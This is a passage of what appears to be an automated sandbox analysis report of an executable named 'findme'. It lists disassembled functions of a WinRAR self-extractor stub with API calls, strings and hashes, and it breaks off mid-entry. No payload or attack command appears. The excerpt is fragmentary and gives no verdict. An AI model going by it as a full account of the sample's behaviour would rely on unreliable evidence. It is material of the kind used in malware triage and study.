                    • Instruction Fuzzy Hash: D8E0E631004584BFCF11AF56DD49A593F69EF40797F104465F9054A632CB39DE52CB58
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: H_prolog_memcmp
                    • String ID:
                    • API String ID: 3004599000-0
                    • Opcode ID: 9de05b284013f89fe3d30eafb1efc6461f76e292d245de6de3b6dfa9a73fb903
                    • Instruction ID: 8714b45bca06e1e27a6fe8e92ed762438cdb8a6096da4fc4a8987e1cd6d87c62
                    • Opcode Fuzzy Hash: 9de05b284013f89fe3d30eafb1efc6461f76e292d245de6de3b6dfa9a73fb903
                    • Instruction Fuzzy Hash: 09822B78904245AEDF65DB60C885FFBB7B9AF05304F0840BFE8499B242DB385E45CB69
                    APIs
                    • __EH_prolog.LIBCMT ref: 004DAEE5
                      • Part of subcall function 004C130B: GetDlgItem.USER32(00000000,00003021), ref: 004C134F
                      • Part of subcall function 004C130B: SetWindowTextW.USER32(00000000,004F35B4), ref: 004C1365
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: H_prologItemTextWindow
                    • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                    • API String ID: 810644672-3617005944
                    • Opcode ID: 30fc7c9c03ba588d29c46bba2f20741392b5f7c70df25dc43ff57b57699c6c58
                    • Instruction ID: bf604449daf891657f977376b9c3300243c78cb423d2f7769eb161c6dee824af
                    • Opcode Fuzzy Hash: 30fc7c9c03ba588d29c46bba2f20741392b5f7c70df25dc43ff57b57699c6c58
                    • Instruction Fuzzy Hash: 1842D774944244BEEB21AB609C9AFBF7B7CEB12708F00405BF641A63D1CB7C4949DB69

                    Control-flow Graph

                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32), ref: 004D00E4
                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004D00F6
                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004D0127
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 004D03D4
                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004D03F0
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004D0402
                    • ReadFile.KERNEL32(00000000,?,00007FFE,004F3BA4,00000000), ref: 004D0421
                    • CloseHandle.KERNEL32(00000000), ref: 004D0479
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 004D048F
                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 004D04E7
                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 004D0510
                    • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 004D054A
                      • Part of subcall function 004D0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004D00A0
                      • Part of subcall function 004D0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004CEB86,Crypt32.dll,00000000,004CEC0A,?,?,004CEBEC,?,?,?), ref: 004D00C2
                    • _swprintf.LIBCMT ref: 004D05BE
                    • _swprintf.LIBCMT ref: 004D060A
                      • Part of subcall function 004C400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004C401D
                    • AllocConsole.KERNEL32 ref: 004D0612
                    • GetCurrentProcessId.KERNEL32 ref: 004D061C
                    • AttachConsole.KERNEL32(00000000), ref: 004D0623
                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 004D0649
                    • WriteConsoleW.KERNEL32(00000000), ref: 004D0650
                    • Sleep.KERNEL32(00002710), ref: 004D065B
                    • FreeConsole.KERNEL32 ref: 004D0661
                    • ExitProcess.KERNEL32 ref: 004D0669
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                    • String ID: <O$ ?O$(>O$(@O$0AO$4=O$8<O$<?O$@>O$@@O$D=O$DAO$DXGIDebug.dll$P<O$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T;O$T?O$X>O$X@O$\AO$`=O$dwmapi.dll$kernel32$l<O$p>O$p?O$p@O$uxtheme.dll$x=O$|<O$>O$?O
                    • API String ID: 1201351596-3813428612
                    • Opcode ID: 55fe34a03b3f82dcf122938e1ae2717ff0ff7393475e469ce920725845cb7120
                    • Instruction ID: b4d3904048076ea8c7d18f143ab4b23798e86a5d8201a64a31381d9f7f192d8a
                    • Opcode Fuzzy Hash: 55fe34a03b3f82dcf122938e1ae2717ff0ff7393475e469ce920725845cb7120
                    • Instruction Fuzzy Hash: 7CD15471104388AFD720DF50D859FAFB6E8AB85706F50891FF78597240DB788648CB6E

                    Control-flow Graph

                    APIs
                    • __EH_prolog.LIBCMT ref: 004DBDFA
                      • Part of subcall function 004DAA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 004DAAFE
                    • SetWindowTextW.USER32(?,?), ref: 004DC127
                    • _wcsrchr.LIBVCRUNTIME ref: 004DC2B1
                    • GetDlgItem.USER32(?,00000066), ref: 004DC2EC
                    • SetWindowTextW.USER32(00000000,?), ref: 004DC2FC
                    • SendMessageW.USER32(00000000,00000143,00000000,0050A472), ref: 004DC30A
                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004DC335
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                    • API String ID: 3564274579-312220925
                    • Opcode ID: 80bab93ad6b2ca4a04965a0a6b9995a0ca874c0ede058d2d44014fd50d17c633
                    • Instruction ID: 390dcf187c68a254f192ab67eda38ebb7384fc6a0a0cd5d685340c11b59032f3
                    • Opcode Fuzzy Hash: 80bab93ad6b2ca4a04965a0a6b9995a0ca874c0ede058d2d44014fd50d17c633
                    • Instruction Fuzzy Hash: FAE19176D00119AADF25DBA1DC99EEF737CAF19305F0040ABF605E3250EB789A84CB58

                    Control-flow Graph

                    APIs
                    • __EH_prolog.LIBCMT ref: 004CD346
                    • _wcschr.LIBVCRUNTIME ref: 004CD367
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,004CD328,?), ref: 004CD382
                    • __fprintf_l.LIBCMT ref: 004CD873
                      • Part of subcall function 004D137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,004CB652,00000000,?,?,?,00010434), ref: 004D1396
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                    • String ID: $ ,$$%s:$$9O$*messages***$*messages***$@%s:$R$RTL$a
                    • API String ID: 4184910265-4228914716
                    • Opcode ID: 370d7617ab7671b7d48b5b36472d07c1eb76f1f61a2642d6dfa0b34fe5bc232f
                    • Instruction ID: 8dcad8c829d9d8a989309773e107263e8067343b8e7f33a3474d86c28e65d9ae
                    • Opcode Fuzzy Hash: 370d7617ab7671b7d48b5b36472d07c1eb76f1f61a2642d6dfa0b34fe5bc232f
                    • Instruction Fuzzy Hash: 7312B5B9D00209AADB64EFA5CC45FEEB7B5EF04304F10407FE505A7291D7789A45CB28

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004DAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004DAC85
                      • Part of subcall function 004DAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004DAC96
                      • Part of subcall function 004DAC74: IsDialogMessageW.USER32(00010434,?), ref: 004DACAA
                      • Part of subcall function 004DAC74: TranslateMessage.USER32(?), ref: 004DACB8
                      • Part of subcall function 004DAC74: DispatchMessageW.USER32(?), ref: 004DACC2
                    • GetDlgItem.USER32(00000068,0051ECB0), ref: 004DCB6E
                    • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,004DA632,00000001,?,?,004DAECB,004F4F88,0051ECB0), ref: 004DCB96
                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 004DCBA1
                    • SendMessageW.USER32(00000000,000000C2,00000000,004F35B4), ref: 004DCBAF
                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 004DCBC5
                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 004DCBDF
                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 004DCC23
                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 004DCC31
                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 004DCC40
                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 004DCC67
                    • SendMessageW.USER32(00000000,000000C2,00000000,004F431C), ref: 004DCC76
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                    • String ID: \
                    • API String ID: 3569833718-2967466578
                    • Opcode ID: 60e50c0ba97959e676da67cda5df183df13687e78a34f3e9fc84a4b1adcdb3d3
                    • Instruction ID: c916924561756b38b7dd27e62cb7adf1603208b1bbf22beeffbf130f52391ea9
                    • Opcode Fuzzy Hash: 60e50c0ba97959e676da67cda5df183df13687e78a34f3e9fc84a4b1adcdb3d3
                    • Instruction Fuzzy Hash: 9F31C471149742BBD311DF20DC4AFAF7FACEF92704F000509F69196291DB645A09E77A

                    Control-flow Graph

                    APIs
                    • ShellExecuteExW.SHELL32(?), ref: 004DCF54
                    • ShowWindow.USER32(?,00000000), ref: 004DCF93
                    • GetExitCodeProcess.KERNEL32(?,?), ref: 004DCFCF
                    • CloseHandle.KERNEL32(?), ref: 004DCFF5
                    • ShowWindow.USER32(?,00000001), ref: 004DD084
                      • Part of subcall function 004D17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,004CBB05,00000000,.exe,?,?,00000800,?,?,004D85DF,?), ref: 004D17C2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                    • String ID: $.exe$.inf
                    • API String ID: 3686203788-2452507128
                    • Opcode ID: 9479ca97932cdb24463781a0c4e02b5a3864adfa679282996b97b3feb822bec3
                    • Instruction ID: d3c1ef0569d1cbfccefe371e3402fe406c6c138437b890fb3f6fdfa1479f2b3c
                    • Opcode Fuzzy Hash: 9479ca97932cdb24463781a0c4e02b5a3864adfa679282996b97b3feb822bec3
                    • Instruction Fuzzy Hash: C8612A70804381AAD7329F14D8646AB7BF5EFD1308F04481FF5C497391D779894ADB9A

                    Control-flow Graph

                    APIs
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,004E4E35,004E4E35,?,?,?,004EA2A9,00000001,00000001,3FE85006), ref: 004EA0B2
                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004EA2A9,00000001,00000001,3FE85006,?,?,?), ref: 004EA138
                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004EA232
                    • __freea.LIBCMT ref: 004EA23F
                      • Part of subcall function 004E8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004EC13D,00000000,?,004E67E2,?,00000008,?,004E89AD,?,?,?), ref: 004E854A
                    • __freea.LIBCMT ref: 004EA248
                    • __freea.LIBCMT ref: 004EA26D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                    • String ID:
                    • API String ID: 1414292761-0
                    • Opcode ID: 39454bc39d4bc273225f064834f867e660a89428fc0dc701122d4cede30ea1b1
                    • Instruction ID: ebb69c4d16572f758995bd7d36ca3c08a3c82ae8cd150a407ea87c1a43c110d6
                    • Opcode Fuzzy Hash: 39454bc39d4bc273225f064834f867e660a89428fc0dc701122d4cede30ea1b1
                    • Instruction Fuzzy Hash: 59510672600246AFDB258F72CC41EBF77A9EB40755F15026AFD04E6340DB39EC60C66A

                    Control-flow Graph

                    APIs
                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,004C78AD,?,00000005,?,00000011), ref: 004C9A4C
                    • GetLastError.KERNEL32(?,?,004C78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004C9A59
                    • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,004C78AD,?,00000005,?), ref: 004C9A8E
                    • GetLastError.KERNEL32(?,?,004C78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004C9A96
                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,004C78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004C9ADB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: File$CreateErrorLast$Time
                    • String ID:
                    • API String ID: 1999340476-0
                    • Opcode ID: a59e5717953493a65450187dca62b7ebc885dc6aa82470e358c69121e0f473cd
                    • Instruction ID: af5f865d14ea39e52d42478d13a8be2eda4756acd7e8572fb865f52c61047e3d
                    • Opcode Fuzzy Hash: a59e5717953493a65450187dca62b7ebc885dc6aa82470e358c69121e0f473cd
                    • Instruction Fuzzy Hash: 564123755447867FE3209B20CC09FABBBD0AB01324F10071EE5A4962D0E779AD98CB99

                    Control-flow Graph

                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004DAC85
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004DAC96
                    • IsDialogMessageW.USER32(00010434,?), ref: 004DACAA
                    • TranslateMessage.USER32(?), ref: 004DACB8
                    • DispatchMessageW.USER32(?), ref: 004DACC2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Message$DialogDispatchPeekTranslate
                    • String ID:
                    • API String ID: 1266772231-0
                    • Opcode ID: 0ba8e13a7248ad9530a58e5daea7bfdc0f4242ac7b383a80ac7e6add6a5e970a
                    • Instruction ID: f0ec54b01b1a0efe90c587843289858ab59a8c5d0e4299e1e117bbf69dfb9490
                    • Opcode Fuzzy Hash: 0ba8e13a7248ad9530a58e5daea7bfdc0f4242ac7b383a80ac7e6add6a5e970a
                    • Instruction Fuzzy Hash: A0F01D75902129BB8B309BE19C4CDEB7F6CEE16661B404416F905D3200EA28D40AD7B1

                    Control-flow Graph

                    APIs
                    • GetClassNameW.USER32(?,?,00000050), ref: 004DA2DE
                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 004DA315
                      • Part of subcall function 004D17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,004CBB05,00000000,.exe,?,?,00000800,?,?,004D85DF,?), ref: 004D17C2
                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 004DA305
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                    • String ID: EDIT
                    • API String ID: 4243998846-3080729518
                    • Opcode ID: 2bcf5aabc7fbf36cdb054488360eca580f863b35b7d0a74e9f4f7a4591aa715e
                    • Instruction ID: 13c7892a04d7d66b3ec3dc7260e732a33f079f14ea9c18cd5984ed0f0c7b3b50
                    • Opcode Fuzzy Hash: 2bcf5aabc7fbf36cdb054488360eca580f863b35b7d0a74e9f4f7a4591aa715e
                    • Instruction Fuzzy Hash: 91F0E236B0122877E7305A249C09FAB77AC9F46B00F440057BE04E2280D7689956C6FE

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004D0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004D00A0
                      • Part of subcall function 004D0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004CEB86,Crypt32.dll,00000000,004CEC0A,?,?,004CEBEC,?,?,?), ref: 004D00C2
                    • OleInitialize.OLE32(00000000), ref: 004DA34E
                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 004DA385
                    • SHGetMalloc.SHELL32(00508430), ref: 004DA38F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                    • String ID: riched20.dll
                    • API String ID: 3498096277-3360196438
                    • Opcode ID: ec04f00c5ccea2bc9d5c1f7e27dce6ce014103ea35fbdcfb0951174a245157fd
                    • Instruction ID: 7b1b302b722116e90d137e67802afc3f12e8425e9d46e69c1c1011a9ebf71776
                    • Opcode Fuzzy Hash: ec04f00c5ccea2bc9d5c1f7e27dce6ce014103ea35fbdcfb0951174a245157fd
                    • Instruction Fuzzy Hash: BDF04475C0010DABDB20AF95D8499EFFBFCEF95305F00415BE814E2200CBB80505CBA1

                    Control-flow Graph

                    APIs
                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 004DD29D
                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 004DD2D9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: EnvironmentVariable
                    • String ID: sfxcmd$sfxpar
                    • API String ID: 1431749950-3493335439
                    • Opcode ID: 458e07c77843ae76f867ef16de4150d48d10a7eab627f6f3b67d69eabfd5accd
                    • Instruction ID: dea0136451d3d26c1d9d941d5521231edeb3d236d5d86952e65f47bc913436fe
                    • Opcode Fuzzy Hash: 458e07c77843ae76f867ef16de4150d48d10a7eab627f6f3b67d69eabfd5accd
                    • Instruction Fuzzy Hash: 7EF0A77690022CA6C7202F959C19FBA7759AF09742B00006BFD4566341DB6CCD50D6F9

                    Control-flow Graph (rendered graph not reproduced; raw node and edge data): control_flow_graph 1024 4c984e-4c985a 1025 4c985c-4c9864 GetStdHandle 1024->1025 1026 4c9867-4c987e ReadFile 1024->1026 1025->1026 1027 4c98da 1026->1027 1028 4c9880-4c9889 call 4c9989 1026->1028 1029 4c98dd-4c98e2 1027->1029 1032 4c988b-4c9893 1028->1032 1033 4c98a2-4c98a6 1028->1033 1032->1033 1034 4c9895 1032->1034 1035 4c98a8-4c98b1 GetLastError 1033->1035 1036 4c98b7-4c98bb 1033->1036 1037 4c9896-4c98a0 call 4c984e 1034->1037 1035->1036 1038 4c98b3-4c98b5 1035->1038 1039 4c98bd-4c98c5 1036->1039 1040 4c98d5-4c98d8 1036->1040 1037->1029 1038->1029 1039->1040 1042 4c98c7-4c98d0 GetLastError 1039->1042 1040->1029 1042->1040 1043 4c98d2-4c98d3 1042->1043 1043->1037
                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 004C985E
                    • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 004C9876
                    • GetLastError.KERNEL32 ref: 004C98A8
                    • GetLastError.KERNEL32 ref: 004C98C7
                    Memory Dump Source
